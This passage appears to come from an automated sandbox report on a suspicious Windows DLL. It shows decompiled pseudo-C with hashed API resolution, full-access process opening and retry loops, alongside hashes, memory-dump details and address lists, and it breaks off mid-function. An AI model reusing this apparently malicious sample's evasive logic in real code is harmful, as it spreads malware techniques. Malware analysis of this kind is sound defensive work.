                                                                                                        • Opcode Fuzzy Hash: 352d76c91212afd11de380c5d6904c807f5abc6bc6d3675186914b2ffa56fc16
                                                                                                        • Instruction Fuzzy Hash: DE3262724146069BCB35DF70CC519EF77A4AFA1208F204F1EF5895A1A2FF71A98AC6C1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 84%
                                                                                                        			E6E47A4E8(signed int* __ecx, void* __eflags) {
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t182;
                                                                                                        				signed int _t183;
                                                                                                        				signed int* _t188;
                                                                                                        				void* _t198;
                                                                                                        				void* _t199;
                                                                                                        				void* _t228;
                                                                                                        				void* _t229;
                                                                                                        				void* _t242;
                                                                                                        				void* _t243;
                                                                                                        				void* _t251;
                                                                                                        				signed int* _t271;
                                                                                                        				void* _t282;
                                                                                                        				void* _t284;
                                                                                                        				void* _t285;
                                                                                                        				void* _t296;
                                                                                                        				signed int* _t308;
                                                                                                        				void* _t324;
                                                                                                        				signed int _t398;
                                                                                                        				signed int _t402;
                                                                                                        				intOrPtr* _t403;
                                                                                                        				intOrPtr* _t404;
                                                                                                        				signed int _t406;
                                                                                                        				signed int _t407;
                                                                                                        				signed int _t409;
                                                                                                        				signed int _t411;
                                                                                                        				signed int _t412;
                                                                                                        				void* _t413;
                                                                                                        				signed int _t414;
                                                                                                        				signed int _t415;
                                                                                                        				signed int _t416;
                                                                                                        				signed int _t419;
                                                                                                        				void* _t420;
                                                                                                        				signed int _t421;
                                                                                                        				void* _t422;
                                                                                                        				signed int _t424;
                                                                                                        				signed int _t429;
                                                                                                        				signed int _t433;
                                                                                                        				signed int _t434;
                                                                                                        				signed int _t437;
                                                                                                        				intOrPtr* _t439;
                                                                                                        
                                                                                                        				_t308 = __ecx;
                                                                                                        				 *(_t439 + 0x78) = 0;
                                                                                                        				 *_t439 = __ecx + 8;
                                                                                                        				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
                                                                                                        				while(1) {
                                                                                                        					_t392 =  *_t308;
                                                                                                        					E6E47B658(_t439 + 0x24, _t392, 0x7fffffff);
                                                                                                        					if(E6E47F4D0(_t439 + 0x24) == 0) {
                                                                                                        						goto L3;
                                                                                                        					} else {
                                                                                                        						_t308[0xc] = 0;
                                                                                                        						E6E47F654(_t439 + 0x24);
                                                                                                        					}
                                                                                                        					L63:
                                                                                                        					_t398 = 0xffffffffffffffff;
                                                                                                        					_t407 = 0xffffffffffffffff;
                                                                                                        					L65:
                                                                                                        					if((_t407 | _t398) != 0) {
                                                                                                        						L68:
                                                                                                        						return _t407;
                                                                                                        					}
                                                                                                        					if( *(_t439 + 0x78) != 0x20) {
                                                                                                        						E6E482234(0x5dc, _t392, _t407);
                                                                                                        						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
                                                                                                        						continue;
                                                                                                        					}
                                                                                                        					_t398 = 0xffffffffffffffff;
                                                                                                        					_t407 = 0xffffffffffffffff;
                                                                                                        					goto L68;
                                                                                                        					L3:
                                                                                                        					__eflags = _t308[1];
                                                                                                        					if(_t308[1] <= 0) {
                                                                                                        						L21:
                                                                                                        						__eflags =  *(_t439 + 0x20);
                                                                                                        						if( *(_t439 + 0x20) <= 0) {
                                                                                                        							L33:
                                                                                                        							E6E47F654(_t439 + 0x24);
                                                                                                        							__eflags = _t308[0xc];
                                                                                                        							if(_t308[0xc] == 0) {
                                                                                                        								L46:
                                                                                                        								 *((intOrPtr*)(_t439 + 8)) = 0;
                                                                                                        								 *((intOrPtr*)(_t439 + 0xc)) = 0;
                                                                                                        								E6E47F584(_t439 + 0x14, 0);
                                                                                                        								 *((intOrPtr*)(_t439 + 0x38)) = 0;
                                                                                                        								 *(_t439 + 0x34) =  *_t308;
                                                                                                        								E6E47F584(_t439 + 0x40, 0);
                                                                                                        								_t182 = 0x40;
                                                                                                        								__eflags = _t308[7] - 0x40;
                                                                                                        								_t183 =  <  ? _t308[7] : _t182;
                                                                                                        								 *(_t439 + 0x74) = _t183;
                                                                                                        								__eflags = _t183;
                                                                                                        								if(_t183 <= 0) {
                                                                                                        									L57:
                                                                                                        									asm("movq xmm0, [0x6e48b808]");
                                                                                                        									asm("movq [esp+0x84], xmm0");
                                                                                                        									_t406 = E6E483064(0x60a28c5c, 0x14e85b34);
                                                                                                        									__eflags = _t406;
                                                                                                        									if(_t406 == 0) {
                                                                                                        										_t424 = 0;
                                                                                                        										__eflags = 0;
                                                                                                        										L61:
                                                                                                        										__eflags = _t424 - 0x3f;
                                                                                                        										if(_t424 <= 0x3f) {
                                                                                                        											__eflags = _t424 << 2;
                                                                                                        											_t308[0xc] =  *(E6E47F4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
                                                                                                        											_t188 = E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
                                                                                                        											_t407 = _t308[0xc];
                                                                                                        											asm("cdq");
                                                                                                        											_t308[0xd] =  *_t188;
                                                                                                        											_t398 = _t392;
                                                                                                        											E6E47B5C4(_t439 + 0x34);
                                                                                                        											E6E47B5C4(_t439 + 8);
                                                                                                        											goto L65;
                                                                                                        										}
                                                                                                        										L62:
                                                                                                        										E6E47B5C4(_t439 + 0x34);
                                                                                                        										E6E47B5C4(_t439 + 8);
                                                                                                        										goto L63;
                                                                                                        									}
                                                                                                        									_t392 = E6E47F4BC(_t439 + 0x14, 0);
                                                                                                        									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
                                                                                                        									_t133 = _t198 - 0x80; // -128
                                                                                                        									_t199 = _t133;
                                                                                                        									__eflags = _t199 - 0x3f;
                                                                                                         									_t424 = (_t199 <= 0x3f) ? _t199 : _t198; // condition operands restored from the preceding flags comparison (_t199 - 0x3f)
                                                                                                        									__eflags = _t424 - 0x102;
                                                                                                        									if(_t424 == 0x102) {
                                                                                                        										goto L62;
                                                                                                        									}
                                                                                                        									goto L61;
                                                                                                        								}
                                                                                                        								_t437 = 0;
                                                                                                        								__eflags = 0;
                                                                                                        								while(1) {
                                                                                                        									E6E47CA8C(_t439 + 0x4c);
                                                                                                        									_t392 = 0;
                                                                                                        									_t324 = _t439 + 0x4c;
                                                                                                        									 *((char*)(_t324 + 4)) = 0;
                                                                                                        									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
                                                                                                        									__eflags = E6E47C280(_t324);
                                                                                                        									if(__eflags != 0) {
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									E6E47F828(_t439 + 0x14, E6E47F4CC(_t439 + 0x10) + 4);
                                                                                                        									 *((intOrPtr*)(E6E47F4BC(_t439 + 0x14, E6E47F4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
                                                                                                        									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
                                                                                                        									_t409 = E6E483064(0x60a28c5c, 0x3659ae1e);
                                                                                                        									__eflags = _t409;
                                                                                                        									if(_t409 == 0) {
                                                                                                        										L51:
                                                                                                        										_t392 =  *(_t439 + 0x68);
                                                                                                        										__eflags = _t392;
                                                                                                        										if(__eflags == 0) {
                                                                                                        											break;
                                                                                                        										}
                                                                                                        										__eflags = _t392 - 0xffffffff;
                                                                                                        										if(__eflags != 0) {
                                                                                                        											E6E47F828(_t439 + 0x40, E6E47F4CC(_t439 + 0x3c) + 4);
                                                                                                        											 *(E6E47F4BC(_t439 + 0x40, E6E47F4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
                                                                                                        											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
                                                                                                        											E6E47CD24(_t439 + 0x4c, __eflags);
                                                                                                        											_t437 = _t437 + 1;
                                                                                                        											__eflags = _t437 -  *(_t439 + 0x74);
                                                                                                        											if(_t437 <  *(_t439 + 0x74)) {
                                                                                                        												continue;
                                                                                                        											}
                                                                                                        											_t411 = 0;
                                                                                                        											__eflags = 0;
                                                                                                        											do {
                                                                                                        												E6E47F4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
                                                                                                        												E6E47F4BC(_t439 + 0x40, _t411 * 4);
                                                                                                        												_t439 = _t439 + 0xffffffd8;
                                                                                                        												asm("cdq");
                                                                                                        												asm("pxor xmm5, xmm5");
                                                                                                        												asm("movd xmm1, dword [ebp]");
                                                                                                        												asm("movd xmm4, dword [edi]");
                                                                                                        												asm("movd xmm0, edx");
                                                                                                        												asm("cdq");
                                                                                                        												asm("punpckldq xmm1, xmm0");
                                                                                                        												asm("movq xmm2, [ebx+0x38]");
                                                                                                        												asm("movq [esp], xmm1");
                                                                                                        												asm("movd xmm3, edx");
                                                                                                        												asm("punpckldq xmm4, xmm3");
                                                                                                        												asm("movq [esp+0x8], xmm2");
                                                                                                        												asm("movq [esp+0x10], xmm4");
                                                                                                        												asm("movq [esp+0x18], xmm5");
                                                                                                        												asm("movq [esp+0x20], xmm5");
                                                                                                        												E6E47AC48(__eflags);
                                                                                                        												_t411 = _t411 + 1;
                                                                                                        												__eflags = _t411 -  *(_t439 + 0x74);
                                                                                                        											} while (_t411 <  *(_t439 + 0x74));
                                                                                                        											goto L57;
                                                                                                        										}
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									_t392 = _t439 + 0x68;
                                                                                                        									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
                                                                                                        									__eflags = 0;
                                                                                                        									if(0 != 0) {
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									goto L51;
                                                                                                        								}
                                                                                                        								E6E47CD24(_t439 + 0x4c, __eflags);
                                                                                                        								goto L62;
                                                                                                        							}
                                                                                                        							_t402 = _t308[1];
                                                                                                        							__eflags = _t402;
                                                                                                        							if(_t402 <= 0) {
                                                                                                        								goto L46;
                                                                                                        							}
                                                                                                        							_t412 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        							while(1) {
                                                                                                        								_t429 = _t412 * 4;
                                                                                                        								_t392 =  *(E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t429));
                                                                                                        								__eflags = _t392 - _t308[0xd];
                                                                                                        								if(_t392 == _t308[0xd]) {
                                                                                                        									break;
                                                                                                        								}
                                                                                                        								_t412 = _t412 + 1;
                                                                                                        								__eflags = _t412 - _t402;
                                                                                                        								if(_t412 < _t402) {
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								goto L46;
                                                                                                        							}
                                                                                                        							__eflags = _t412 - 0xffffffff;
                                                                                                        							if(_t412 != 0xffffffff) {
                                                                                                        								_t228 = E6E47F4CC( *((intOrPtr*)(_t439 + 4)));
                                                                                                        								__eflags = _t228 - _t429;
                                                                                                        								if(_t228 > _t429) {
                                                                                                        									_t392 = 4 + _t412 * 4;
                                                                                                        									 *(_t439 + 0x6c) = _t392;
                                                                                                        									_t251 = E6E47F4CC( *((intOrPtr*)(_t439 + 4)));
                                                                                                        									__eflags = _t251 -  *(_t439 + 0x6c);
                                                                                                        									if(_t251 >  *(_t439 + 0x6c)) {
                                                                                                        										 *((intOrPtr*)(_t439 + 0x90)) = E6E47F4BC( *((intOrPtr*)(_t439 + 8)), _t429);
                                                                                                        										 *((intOrPtr*)(_t439 + 0x8c)) = E6E47F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
                                                                                                        										E6E4838F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
                                                                                                        										_t439 = _t439 + 0xc;
                                                                                                        									}
                                                                                                        									E6E47F828( *((intOrPtr*)(_t439 + 8)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
                                                                                                        									_t74 =  &(_t308[7]);
                                                                                                        									 *_t74 = _t308[7] - 1;
                                                                                                        									__eflags =  *_t74;
                                                                                                        								}
                                                                                                        								_t229 = E6E47F4CC( *_t439);
                                                                                                        								__eflags = _t229 - _t429;
                                                                                                        								if(_t229 > _t429) {
                                                                                                        									_t413 = 4 + _t412 * 4;
                                                                                                        									_t242 = E6E47F4CC( *_t439);
                                                                                                        									__eflags = _t242 - _t413;
                                                                                                        									if(_t242 > _t413) {
                                                                                                        										_t243 = E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t429);
                                                                                                        										 *((intOrPtr*)(_t439 + 0x94)) = E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t413);
                                                                                                        										E6E4838F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E47F4CC( *_t439) - _t413);
                                                                                                        										_t439 = _t439 + 0xc;
                                                                                                        									}
                                                                                                        									E6E47F828( *((intOrPtr*)(_t439 + 4)), E6E47F4CC( *_t439) + 0xfffffffc);
                                                                                                        									_t79 =  &(_t308[1]);
                                                                                                        									 *_t79 = _t308[1] - 1;
                                                                                                        									__eflags =  *_t79;
                                                                                                        								}
                                                                                                        								E6E47F828( *((intOrPtr*)(_t439 + 8)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
                                                                                                        								 *(E6E47F4BC( *((intOrPtr*)(_t439 + 8)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
                                                                                                        								_t308[7] = _t308[7] + 1;
                                                                                                        								E6E47F828( *((intOrPtr*)(_t439 + 4)), E6E47F4CC( *_t439) + 4);
                                                                                                        								 *(E6E47F4BC( *((intOrPtr*)(_t439 + 4)), E6E47F4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
                                                                                                        								_t308[1] = _t308[1] + 1;
                                                                                                        							}
                                                                                                        							goto L46;
                                                                                                        						}
                                                                                                        						_t433 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        						do {
                                                                                                        							 *(_t439 + 0x70) = _t433 * 4;
                                                                                                        							_t403 = E6E47F4BC(_t439 + 0x28, _t433 * 4);
                                                                                                        							_t392 = _t308[1];
                                                                                                        							 *(_t439 + 0x80) = _t392;
                                                                                                        							__eflags = _t392;
                                                                                                        							if(_t392 <= 0) {
                                                                                                        								L29:
                                                                                                        								_t414 = E6E483064(0x8e844d1e, 0x5c3654e3);
                                                                                                        								__eflags = _t414;
                                                                                                        								if(_t414 != 0) {
                                                                                                        									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E47F4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
                                                                                                        									__eflags = _t416;
                                                                                                        									if(_t416 != 0) {
                                                                                                        										E6E47F828( *((intOrPtr*)(_t439 + 8)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
                                                                                                        										 *(E6E47F4BC( *((intOrPtr*)(_t439 + 8)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
                                                                                                        										_t308[7] = _t308[7] + 1;
                                                                                                        										_t271 = E6E47F4BC(_t439 + 0x28,  *(_t439 + 0x70));
                                                                                                        										E6E47F828( *((intOrPtr*)(_t439 + 4)), E6E47F4CC( *_t439) + 4);
                                                                                                        										 *(E6E47F4BC( *((intOrPtr*)(_t439 + 4)), E6E47F4CC( *_t439) + 0xfffffffc)) =  *_t271;
                                                                                                        										_t57 =  &(_t308[1]);
                                                                                                        										 *_t57 = _t308[1] + 1;
                                                                                                        										__eflags =  *_t57;
                                                                                                        									}
                                                                                                        								}
                                                                                                        								goto L32;
                                                                                                        							}
                                                                                                        							_t415 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        							while(1) {
                                                                                                        								_t392 =  *(E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
                                                                                                        								__eflags = _t392 -  *_t403;
                                                                                                        								if(_t392 ==  *_t403) {
                                                                                                        									break;
                                                                                                        								}
                                                                                                        								_t415 = _t415 + 1;
                                                                                                        								__eflags = _t415 -  *(_t439 + 0x80);
                                                                                                        								if(_t415 <  *(_t439 + 0x80)) {
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								goto L29;
                                                                                                        							}
                                                                                                        							__eflags = _t415 - 0xffffffff;
                                                                                                        							if(_t415 == 0xffffffff) {
                                                                                                        								goto L29;
                                                                                                        							}
                                                                                                        							L32:
                                                                                                        							_t433 = _t433 + 1;
                                                                                                        							__eflags = _t433 -  *(_t439 + 0x20);
                                                                                                        						} while (_t433 <  *(_t439 + 0x20));
                                                                                                        						goto L33;
                                                                                                        					} else {
                                                                                                        						_t434 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        						do {
                                                                                                        							 *(_t439 + 0x64) = _t434 * 4;
                                                                                                        							_t404 = E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
                                                                                                        							_t392 =  *(_t439 + 0x20);
                                                                                                        							 *(_t439 + 0x7c) = _t392;
                                                                                                        							__eflags = _t392;
                                                                                                        							if(_t392 <= 0) {
                                                                                                        								L11:
                                                                                                        								_t282 = E6E47F4CC( *_t439);
                                                                                                        								__eflags = _t282 -  *(_t439 + 0x64);
                                                                                                        								if(_t282 >  *(_t439 + 0x64)) {
                                                                                                        									_t420 = 4 + _t434 * 4;
                                                                                                        									_t296 = E6E47F4CC( *_t439);
                                                                                                        									__eflags = _t296 - _t420;
                                                                                                        									if(_t296 > _t420) {
                                                                                                        										 *((intOrPtr*)(_t439 + 0x9c)) = E6E47F4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
                                                                                                        										 *((intOrPtr*)(_t439 + 0x98)) = E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t420);
                                                                                                        										E6E4838F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E47F4CC( *_t439) - _t420);
                                                                                                        										_t439 = _t439 + 0xc;
                                                                                                        									}
                                                                                                        									E6E47F828( *((intOrPtr*)(_t439 + 4)), E6E47F4CC( *_t439) + 0xfffffffc);
                                                                                                        									_t22 =  &(_t308[1]);
                                                                                                        									 *_t22 = _t308[1] - 1;
                                                                                                        									__eflags =  *_t22;
                                                                                                        								}
                                                                                                        								_t419 = E6E483064(0x60a28c5c, 0xe96b154c);
                                                                                                        								__eflags = _t419;
                                                                                                        								if(_t419 != 0) {
                                                                                                        									 *_t419( *((intOrPtr*)(E6E47F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
                                                                                                        								}
                                                                                                        								_t284 = E6E47F4CC( *((intOrPtr*)(_t439 + 4)));
                                                                                                        								__eflags = _t284 -  *(_t439 + 0x64);
                                                                                                        								if(_t284 >  *(_t439 + 0x64)) {
                                                                                                        									_t422 = 4 + _t434 * 4;
                                                                                                        									_t285 = E6E47F4CC( *((intOrPtr*)(_t439 + 4)));
                                                                                                        									__eflags = _t285 - _t422;
                                                                                                        									if(_t285 > _t422) {
                                                                                                        										 *((intOrPtr*)(_t439 + 0xa4)) = E6E47F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
                                                                                                        										 *((intOrPtr*)(_t439 + 0xa0)) = E6E47F4BC( *((intOrPtr*)(_t439 + 8)), _t422);
                                                                                                        										E6E4838F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
                                                                                                        										_t439 = _t439 + 0xc;
                                                                                                        									}
                                                                                                        									E6E47F828( *((intOrPtr*)(_t439 + 8)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
                                                                                                        									_t33 =  &(_t308[7]);
                                                                                                        									 *_t33 = _t308[7] - 1;
                                                                                                        									__eflags =  *_t33;
                                                                                                        								}
                                                                                                        								_t434 = _t434 - 1;
                                                                                                        								__eflags = _t434;
                                                                                                        								goto L20;
                                                                                                        							}
                                                                                                        							_t421 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        							while(1) {
                                                                                                        								_t392 =  *(E6E47F4BC(_t439 + 0x28, _t421 * 4));
                                                                                                        								__eflags = _t392 -  *_t404;
                                                                                                        								if(_t392 ==  *_t404) {
                                                                                                        									break;
                                                                                                        								}
                                                                                                        								_t421 = _t421 + 1;
                                                                                                        								__eflags = _t421 -  *(_t439 + 0x7c);
                                                                                                        								if(_t421 <  *(_t439 + 0x7c)) {
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								goto L11;
                                                                                                        							}
                                                                                                        							__eflags = _t421 - 0xffffffff;
                                                                                                        							if(_t421 == 0xffffffff) {
                                                                                                        								goto L11;
                                                                                                        							}
                                                                                                        							L20:
                                                                                                        							_t434 = _t434 + 1;
                                                                                                        							__eflags = _t434 - _t308[1];
                                                                                                        						} while (_t434 < _t308[1]);
                                                                                                        						goto L21;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}













































                                                                                                        0x6e47a851
                                                                                                        0x6e47a856
                                                                                                        0x6e47a866
                                                                                                        0x6e47a883
                                                                                                        0x6e47a885
                                                                                                        0x6e47a885
                                                                                                        0x00000000
                                                                                                        0x6e47a79d
                                                                                                        0x6e47a653
                                                                                                        0x6e47a653
                                                                                                        0x6e47a655
                                                                                                        0x6e47a65c
                                                                                                        0x6e47a66a
                                                                                                        0x6e47a66c
                                                                                                        0x6e47a66f
                                                                                                        0x6e47a676
                                                                                                        0x6e47a678
                                                                                                        0x6e47a6a9
                                                                                                        0x6e47a6b8
                                                                                                        0x6e47a6ba
                                                                                                        0x6e47a6bc
                                                                                                        0x6e47a6da
                                                                                                        0x6e47a6dc
                                                                                                        0x6e47a6de
                                                                                                        0x6e47a6f1
                                                                                                        0x6e47a710
                                                                                                        0x6e47a716
                                                                                                        0x6e47a719
                                                                                                        0x6e47a730
                                                                                                        0x6e47a74c
                                                                                                        0x6e47a74e
                                                                                                        0x6e47a74e
                                                                                                        0x6e47a74e
                                                                                                        0x6e47a74e
                                                                                                        0x6e47a6de
                                                                                                        0x00000000
                                                                                                        0x6e47a6bc
                                                                                                        0x6e47a67c
                                                                                                        0x6e47a67c
                                                                                                        0x6e47a67e
                                                                                                        0x6e47a68f
                                                                                                        0x6e47a691
                                                                                                        0x6e47a693
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a69f
                                                                                                        0x6e47a6a0
                                                                                                        0x6e47a6a7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a6a7
                                                                                                        0x6e47a695
                                                                                                        0x6e47a698
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a751
                                                                                                        0x6e47a751
                                                                                                        0x6e47a752
                                                                                                        0x6e47a752
                                                                                                        0x00000000
                                                                                                        0x6e47a545
                                                                                                        0x6e47a547
                                                                                                        0x6e47a547
                                                                                                        0x6e47a549
                                                                                                        0x6e47a550
                                                                                                        0x6e47a55e
                                                                                                        0x6e47a560
                                                                                                        0x6e47a564
                                                                                                        0x6e47a568
                                                                                                        0x6e47a56a
                                                                                                        0x6e47a598
                                                                                                        0x6e47a59b
                                                                                                        0x6e47a5a0
                                                                                                        0x6e47a5a4
                                                                                                        0x6e47a5a9
                                                                                                        0x6e47a5b0
                                                                                                        0x6e47a5b5
                                                                                                        0x6e47a5b7
                                                                                                        0x6e47ab7e
                                                                                                        0x6e47ab8f
                                                                                                        0x6e47abaf
                                                                                                        0x6e47abb4
                                                                                                        0x6e47abb4
                                                                                                        0x6e47a5cd
                                                                                                        0x6e47a5d2
                                                                                                        0x6e47a5d2
                                                                                                        0x6e47a5d2
                                                                                                        0x6e47a5d2
                                                                                                        0x6e47a5e4
                                                                                                        0x6e47a5e6
                                                                                                        0x6e47a5e8
                                                                                                        0x6e47a5f9
                                                                                                        0x6e47a5f9
                                                                                                        0x6e47a5ff
                                                                                                        0x6e47a604
                                                                                                        0x6e47a608
                                                                                                        0x6e47a60e
                                                                                                        0x6e47a615
                                                                                                        0x6e47a61a
                                                                                                        0x6e47a61c
                                                                                                        0x6e47ab32
                                                                                                        0x6e47ab43
                                                                                                        0x6e47ab64
                                                                                                        0x6e47ab69
                                                                                                        0x6e47ab69
                                                                                                        0x6e47a633
                                                                                                        0x6e47a638
                                                                                                        0x6e47a638
                                                                                                        0x6e47a638
                                                                                                        0x6e47a638
                                                                                                        0x6e47a63b
                                                                                                        0x6e47a63b
                                                                                                        0x00000000
                                                                                                        0x6e47a63b
                                                                                                        0x6e47a56e
                                                                                                        0x6e47a56e
                                                                                                        0x6e47a570
                                                                                                        0x6e47a581
                                                                                                        0x6e47a583
                                                                                                        0x6e47a585
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a591
                                                                                                        0x6e47a592
                                                                                                        0x6e47a596
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a596
                                                                                                        0x6e47a587
                                                                                                        0x6e47a58a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a63c
                                                                                                        0x6e47a63c
                                                                                                        0x6e47a63d
                                                                                                        0x6e47a63d
                                                                                                        0x00000000
                                                                                                        0x6e47a549
                                                                                                        0x6e47a53f

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 1e19f48ab1ebb66dade0cbd36344482ead3a6b9c60c6d1263ec1782a47758a6e
                                                                                                        • Instruction ID: 33183007dd460dd14bbbbdee96dcb1f01e6dfcbabfed66f237eaf4f021449526
                                                                                                        • Opcode Fuzzy Hash: 1e19f48ab1ebb66dade0cbd36344482ead3a6b9c60c6d1263ec1782a47758a6e
                                                                                                        • Instruction Fuzzy Hash: 97127F715192019FCB34DFB4C880EEAB7A9AF95304F104E1EE999972A1EB30DC45DBC2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 93%
                                                                                                        			E6E478428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int* _t173;
                                                                                                        				signed int* _t178;
                                                                                                        				void* _t180;
                                                                                                        				void* _t181;
                                                                                                        				intOrPtr* _t188;
                                                                                                        				signed int _t202;
                                                                                                        				intOrPtr* _t211;
                                                                                                        				intOrPtr* _t212;
                                                                                                        				intOrPtr* _t217;
                                                                                                        				signed int* _t218;
                                                                                                        				void* _t219;
                                                                                                        				void* _t220;
                                                                                                        				void* _t237;
                                                                                                        				void* _t238;
                                                                                                        				signed int* _t246;
                                                                                                        				void* _t247;
                                                                                                        				signed int* _t258;
                                                                                                        				intOrPtr* _t269;
                                                                                                        				signed int* _t277;
                                                                                                        				intOrPtr* _t279;
                                                                                                        				void* _t283;
                                                                                                        				void* _t285;
                                                                                                        				void* _t287;
                                                                                                        				signed int* _t296;
                                                                                                        				void* _t299;
                                                                                                        				signed int* _t308;
                                                                                                        				intOrPtr* _t310;
                                                                                                        				signed int _t315;
                                                                                                        				intOrPtr _t317;
                                                                                                        				signed int* _t322;
                                                                                                        				signed int _t323;
                                                                                                        				signed int _t324;
                                                                                                        				void* _t343;
                                                                                                        				void* _t414;
                                                                                                        				signed int _t415;
                                                                                                        				signed int* _t421;
                                                                                                        				signed int _t427;
                                                                                                        				intOrPtr* _t428;
                                                                                                        				intOrPtr* _t429;
                                                                                                        				signed int _t431;
                                                                                                        				signed int _t433;
                                                                                                        				signed int _t437;
                                                                                                        				signed int _t438;
                                                                                                        				signed int _t439;
                                                                                                        				signed int _t442;
                                                                                                        				void* _t443;
                                                                                                        				signed int _t444;
                                                                                                        				void* _t445;
                                                                                                        				signed int _t446;
                                                                                                        				intOrPtr* _t449;
                                                                                                        
                                                                                                        				 *_t449 = __ecx + 0x1c;
                                                                                                        				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
                                                                                                        				 *(_t449 + 4) = __ecx;
                                                                                                        				 *(_t449 + 0x84) = 0;
                                                                                                        				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
                                                                                                        				while(1) {
                                                                                                        					_t413 =  *(_t449 + 0x6c);
                                                                                                        					E6E47B658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
                                                                                                        					if(E6E47F4D0(_t449 + 0x24) == 0) {
                                                                                                        						goto L3;
                                                                                                        					} else {
                                                                                                        						( *(_t449 + 4))[0xb] = 0;
                                                                                                        						E6E47F654(_t449 + 0x24);
                                                                                                        					}
                                                                                                        					L60:
                                                                                                        					_t317 = 0xffffffffffffffff;
                                                                                                        					L62:
                                                                                                        					if(_t317 != 0) {
                                                                                                        						L65:
                                                                                                        						return _t317;
                                                                                                        					}
                                                                                                        					if( *(_t449 + 0x84) != 0x20) {
                                                                                                        						E6E482234(0x5dc, _t413, _t430);
                                                                                                        						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
                                                                                                        						continue;
                                                                                                        					}
                                                                                                        					_t317 = 0xffffffffffffffff;
                                                                                                        					goto L65;
                                                                                                        					L3:
                                                                                                        					__eflags =  *( *(_t449 + 4));
